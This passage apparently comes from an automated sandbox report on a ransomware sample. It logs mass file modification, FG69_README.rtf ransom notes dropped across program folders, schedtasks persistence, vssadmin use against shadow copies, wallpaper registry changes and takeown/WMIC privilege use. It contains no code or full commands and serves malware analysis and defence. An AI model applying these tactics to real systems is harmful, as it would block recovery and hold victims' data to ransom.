d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark_mac.css d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Indian\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Whitehorse d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\management\management.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Guayaquil d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\rt.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\zi\America\Kentucky\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvDX9.x3d d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\java.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox_1.0.500.v20131211-1531.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Grand_Turk d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\LICENSE d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Madrid d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\chrome_pwa_launcher.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tokyo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\images\cursors\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\crashreporter-override.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Lindeman d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Guam d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\main.css d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ca.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCallbacks.h d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Marengo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.util_8.1.14.v20131031.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.ja_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\CST6 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+2 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Indianapolis d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Eula.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\license.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\updater.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_LinkDrop32x32.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\jsse.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Manaus d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\ct.sym d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property_1.4.200.v20140214-0004.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Adak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt_1.1.1.v20140903-0821.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\RestoreSelect.hta d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-text_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Fiji d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\java-rmi.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\CST6CDT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\SettingsInternal.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jni.h d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro_3.4.200.v20130326-1254.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ulaanbaatar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-uisupport.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-compat_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\omni.ja d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kamchatka d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\gu.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\alt-rt.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Martinique d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Sao_Paulo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Halifax d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_MoveNoDrop32x32.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\WET d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AssemblyInfoInternal.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bahia_Banderas d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\es-419.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tashkent d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jmx_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\jp2launcher.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Mozilla Firefox\uninstall\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicHandle.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-util.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerActionExceptionHandlers.exsd d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nipigon d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+5 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Samara d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Vladivostok d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1236 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1912 vssadmin.exe -
Modifies Control Panel 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Control Panel\Desktop reg.exe Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Control Panel\Desktop\WallpaperStyle = "0" reg.exe Key created \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Control Panel\Desktop\TileWallpaper = "0" reg.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1060 IhR8G8EE64.exe 1060 IhR8G8EE64.exe 1060 IhR8G8EE64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 1060 IhR8G8EE64.exe -
Suspicious use of AdjustPrivilegeToken 96 IoCs
description pid Process Token: SeDebugPrivilege 1060 IhR8G8EE64.exe Token: SeLoadDriverPrivilege 1060 IhR8G8EE64.exe Token: SeBackupPrivilege 1844 vssvc.exe Token: SeRestorePrivilege 1844 vssvc.exe Token: SeAuditPrivilege 1844 vssvc.exe Token: SeTakeOwnershipPrivilege 1756 takeown.exe Token: SeTakeOwnershipPrivilege 1608 takeown.exe Token: SeIncreaseQuotaPrivilege 280 WMIC.exe Token: SeSecurityPrivilege 280 WMIC.exe Token: SeTakeOwnershipPrivilege 280 WMIC.exe Token: SeLoadDriverPrivilege 280 WMIC.exe Token: SeSystemProfilePrivilege 280 WMIC.exe Token: SeSystemtimePrivilege 280 WMIC.exe Token: SeProfSingleProcessPrivilege 280 WMIC.exe Token: SeIncBasePriorityPrivilege 280 WMIC.exe Token: SeCreatePagefilePrivilege 280 WMIC.exe Token: SeBackupPrivilege 280 WMIC.exe Token: SeRestorePrivilege 280 WMIC.exe Token: SeShutdownPrivilege 280 WMIC.exe Token: SeDebugPrivilege 280 WMIC.exe Token: SeSystemEnvironmentPrivilege 280 WMIC.exe Token: SeRemoteShutdownPrivilege 280 WMIC.exe Token: SeUndockPrivilege 280 WMIC.exe Token: SeManageVolumePrivilege 280 WMIC.exe Token: 33 280 WMIC.exe Token: 34 280 WMIC.exe Token: 35 280 WMIC.exe Token: SeTakeOwnershipPrivilege 1096 takeown.exe Token: SeIncreaseQuotaPrivilege 280 WMIC.exe Token: SeSecurityPrivilege 280 WMIC.exe Token: SeTakeOwnershipPrivilege 280 WMIC.exe Token: SeLoadDriverPrivilege 280 WMIC.exe Token: SeSystemProfilePrivilege 280 WMIC.exe Token: SeSystemtimePrivilege 280 WMIC.exe Token: SeProfSingleProcessPrivilege 280 WMIC.exe Token: SeIncBasePriorityPrivilege 280 WMIC.exe Token: SeCreatePagefilePrivilege 280 WMIC.exe Token: SeBackupPrivilege 280 WMIC.exe Token: SeRestorePrivilege 280 WMIC.exe Token: SeShutdownPrivilege 280 WMIC.exe Token: SeDebugPrivilege 280 WMIC.exe Token: SeSystemEnvironmentPrivilege 280 WMIC.exe Token: SeRemoteShutdownPrivilege 280 WMIC.exe Token: SeUndockPrivilege 280 WMIC.exe Token: SeManageVolumePrivilege 280 WMIC.exe Token: 33 280 WMIC.exe Token: 34 280 WMIC.exe Token: 35 280 WMIC.exe Token: SeTakeOwnershipPrivilege 1168 takeown.exe Token: SeTakeOwnershipPrivilege 2016 takeown.exe Token: SeTakeOwnershipPrivilege 1412 takeown.exe Token: SeTakeOwnershipPrivilege 928 takeown.exe Token: SeTakeOwnershipPrivilege 1372 takeown.exe Token: SeTakeOwnershipPrivilege 224 takeown.exe Token: SeTakeOwnershipPrivilege 1344 takeown.exe Token: SeTakeOwnershipPrivilege 236 takeown.exe Token: SeTakeOwnershipPrivilege 1876 takeown.exe Token: SeTakeOwnershipPrivilege 484 takeown.exe Token: SeTakeOwnershipPrivilege 928 takeown.exe Token: SeTakeOwnershipPrivilege 916 takeown.exe Token: SeTakeOwnershipPrivilege 1512 takeown.exe Token: SeTakeOwnershipPrivilege 940 takeown.exe Token: SeTakeOwnershipPrivilege 224 takeown.exe Token: SeTakeOwnershipPrivilege 1800 takeown.exe Token: SeTakeOwnershipPrivilege 928 takeown.exe Token: SeTakeOwnershipPrivilege 1912 takeown.exe Token: SeTakeOwnershipPrivilege 1108 takeown.exe Token: SeTakeOwnershipPrivilege 1376 takeown.exe Token: SeTakeOwnershipPrivilege 1800 takeown.exe Token: SeTakeOwnershipPrivilege 1168 takeown.exe Token: SeTakeOwnershipPrivilege 1816 takeown.exe Token: SeTakeOwnershipPrivilege 1952 takeown.exe Token: SeTakeOwnershipPrivilege 1840 takeown.exe Token: SeTakeOwnershipPrivilege 1936 takeown.exe Token: SeTakeOwnershipPrivilege 944 takeown.exe Token: SeTakeOwnershipPrivilege 932 takeown.exe Token: SeTakeOwnershipPrivilege 1888 takeown.exe Token: SeTakeOwnershipPrivilege 220 takeown.exe Token: SeTakeOwnershipPrivilege 1608 takeown.exe Token: SeTakeOwnershipPrivilege 1860 takeown.exe Token: SeTakeOwnershipPrivilege 1892 takeown.exe Token: SeTakeOwnershipPrivilege 228 takeown.exe Token: SeTakeOwnershipPrivilege 292 takeown.exe Token: SeTakeOwnershipPrivilege 1528 takeown.exe Token: SeTakeOwnershipPrivilege 484 takeown.exe Token: SeTakeOwnershipPrivilege 296 takeown.exe Token: SeTakeOwnershipPrivilege 1800 takeown.exe Token: SeTakeOwnershipPrivilege 1892 takeown.exe Token: SeTakeOwnershipPrivilege 1772 takeown.exe Token: SeTakeOwnershipPrivilege 212 takeown.exe Token: SeTakeOwnershipPrivilege 220 takeown.exe Token: SeTakeOwnershipPrivilege 280 takeown.exe Token: SeTakeOwnershipPrivilege 1752 takeown.exe Token: SeTakeOwnershipPrivilege 1528 takeown.exe Token: SeTakeOwnershipPrivilege 1580 takeown.exe Token: SeTakeOwnershipPrivilege 216 takeown.exe -
Suspicious use of WriteProcessMemory 4362 IoCs
